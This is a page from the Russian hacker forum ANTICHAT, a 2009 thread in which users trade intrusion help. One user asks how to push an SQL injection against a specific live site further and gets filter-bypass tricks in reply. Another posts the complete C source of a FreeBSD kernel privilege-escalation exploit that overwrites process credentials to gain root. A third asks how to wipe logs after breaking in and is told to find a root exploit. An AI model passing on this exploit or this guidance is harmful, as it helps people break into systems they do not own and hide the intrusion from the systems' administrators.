ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #9021  
Старый 18.09.2009, 16:06
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
С нами: 9798146

Репутация: 1224


По умолчанию

перезапустить апач нужно
 
Ответить с цитированием

  #9022  
Старый 18.09.2009, 16:30
BlackSun
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
С нами: 10058786

Репутация: 4589


По умолчанию

Цитата:
Сообщение от Велемир  
_http://www.xakep.ru/post/49508/default.asp

В самом начале про протокол DATA.У кого-нибудь это работает? У меня даже такой директивы в php.ini allow_url_include нету.После того,как прописал,тоже ничего не изменилось.
Цитата:
(php>=5.2.0 - именно с этой версии включена поддержка data и других протоколов)
...
 
Ответить с цитированием

  #9023  
Старый 18.09.2009, 16:33
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
С нами: 10692266

Репутация: 3486


По умолчанию

Цитата:
Сообщение от BlackSun  
...
Да ему поxуй вообще, он по 10% читает.
__________________
..
 
Ответить с цитированием

  #9024  
Старый 19.09.2009, 10:57
Train
Новичок
Регистрация: 09.01.2009
Сообщений: 21
С нами: 9124815

Репутация: 10
По умолчанию

Здравствуйте уважаемые Гуру, у меня возник один сложный для меня, но возможно вполне простой для вас вопрос
Цитата:
http://site.ru/news/19/08/2009/603-1/
Гребаные ЧПУ, ненавижу их, но суть не в этом. С -1 все правильно работает, т.е. инъекция есть. если поставить /news/19/08/2009/603+--/ ругается на + страшными словами(если без + то все ровно):
Incorrect syntax near '+'.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

Exception Details: System.Data.SqlClient.SqlException: Incorrect syntax near '+'.
Source Error:

Line 144: SqlDataAdapter adp = new SqlDataAdapter(q, myConn);
Line 145: dt = new DataTable();
Line 146: adp.Fill(dt);
Line 147: myConn.Close();
Line 148: break;
Version Information: Microsoft .NET Framework Version:2.0.50727.3082; ASP.NET Version:2.0.50727.3082
С MSsql я, скажем так, знаком только отдаленно(кстати не факт что mssql), но мануалы читал, однако что-то в голову никаких мыслей не пришло, единственное что опытным путем удалось установить что этот параметр в запросе самый последний после 603 идет ;
Кстати если вместо + в предыдущем запросе поставить пробел ругается абсолютно точно также. Если /news/19/08/2009/603;--/ то ругается Incorrect syntax near 'b'. Нужен ваш совет что делать дальше, какие конструкции попробовать, устроил бы даже посимвольный перебор содержимого БД.
 
Ответить с цитированием

  #9025  
Старый 19.09.2009, 11:08
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

Вместо плюса используй:
Код:
 (пробел)
/**/
%09
%0A
%0D

Последний раз редактировалось mailbrush; 19.09.2009 в 11:10..
 
Ответить с цитированием

  #9026  
Старый 19.09.2009, 11:11
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
С нами: 8797559

Репутация: -16
По умолчанию

a kakie bugi v dle scripte pojalusta??
 
Ответить с цитированием

  #9027  
Старый 19.09.2009, 11:14
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

http://forum.antichat.ru/thread52195.html
 
Ответить с цитированием

  #9028  
Старый 19.09.2009, 11:27
SeNaP
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
С нами: 9347610

Репутация: 165
По умолчанию

Может не в ту тему я попал, извиняйте меня
Кто может скомпилировать ?
Код:
/*
* This is a quick and very dirty exploit for the FreeBSD protosw vulnerability
* defined here: 
* http://security.freebsd.org/advisories/FreeBSD-SA-08:13.protosw.asc
*
* This will overwrite your credential structure in the kernel. This will 
* affect more than just the exploit's process, which is why this doesn't
* spawn a shell. When the exploit has finished, your login shell should
* have euid=0. 
*
* Enjoy, and happy holidays!
*  - Don "north" Bailey (don.bailey@gmail.com) 12/25/2008
*/

#include <sys/mman.h>
#include <sys/time.h>
#include <sys/stat.h>
#include <sys/proc.h>
#include <sys/types.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <netgraph/ng_socket.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <errno.h>

#define PAGES 1
#define PATTERN1 0x8f8f8f8f
#define PATTERN2 0x6e6e6e6e

typedef unsigned long ulong;
typedef unsigned char uchar;

int
x(void)
{
    struct proc * p = (struct proc * )PATTERN1;
    uint * i;

    while(1)
    {
        if(p->p_pid == PATTERN2)
        {
            i = (uint * )p->p_ucred;
            *++i = 0;
            break;
        }

        p = p->p_list.le_next;
    }

    return 1;
}

int
main(int argc, char * argv[])
{
    ulong addr;
    uchar * c;
    uchar * d;
    uint * i;
    void * v;
    int pid;
    int s;

    if(argc != 2)
    {
        fprintf(stderr, "usage: ./x <allproc>\n");
        return 1;
    }

    addr = strtoul(argv[1], 0, 0);

    v = mmap(
        NULL,
        (PAGES*PAGE_SIZE),
        PROT_READ|PROT_WRITE|PROT_EXEC, 
        MAP_ANON|MAP_FIXED, 
        -1, 
        0);
    if(v == MAP_FAILED)
    {
        perror("mmap");
        return 0;
    }

    c = v;
    d = (uchar * )x;
    while(1)
    {
        *c = *d;
        if(*d == 0xc3)
        {
            break;
        }

        d++;
        c++;
    }

    *c++ = 0xc3;

    c = v;
    while(1)
    {
        if(*(long * )c == PATTERN1)
        {
            *(c + 0) = addr >>  0;
            *(c + 1) = addr >>  8;
            *(c + 2) = addr >> 16;
            *(c + 3) = addr >> 24;
            break;
        }
        c++;
    }

    pid = getpid();
    while(1)
    {
        if(*(long * )c == PATTERN2)
        {
            *(c + 0) = pid >>  0;
            *(c + 1) = pid >>  8;
            *(c + 2) = pid >> 16;
            *(c + 3) = pid >> 24;
            break;
        }
        c++;
    }

    s = socket(PF_NETGRAPH, SOCK_DGRAM, NG_DATA);
    if(s < 0)
    {
        perror("socket");
        return 1;
    }

    shutdown(s, SHUT_RDWR);

    return 0;
}
А то у меня не получается

Последний раз редактировалось SeNaP; 19.09.2009 в 11:30..
 
Ответить с цитированием

  #9029  
Старый 19.09.2009, 15:36
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами: 9567480

Репутация: 61
По умолчанию

Код:
uid=1000(web) gid=1000(web) groups=1000(web
У меня достаточно прав для чистки логов?
Если да то что за собой нужно чистить?
 
Ответить с цитированием

  #9030  
Старый 19.09.2009, 16:03
SeNaP
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
С нами: 9347610

Репутация: 165
По умолчанию

Цитата:
Сообщение от Byrger  
Код:
uid=1000(web) gid=1000(web) groups=1000(web
У меня достаточно прав для чистки логов?
Если да то что за собой нужно чистить?
Не не хватит, тебе нужны прова рута, дя чтение и записи файлов
Ищи сплойт для подняите прав

Последний раз редактировалось SeNaP; 19.09.2009 в 16:11..
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.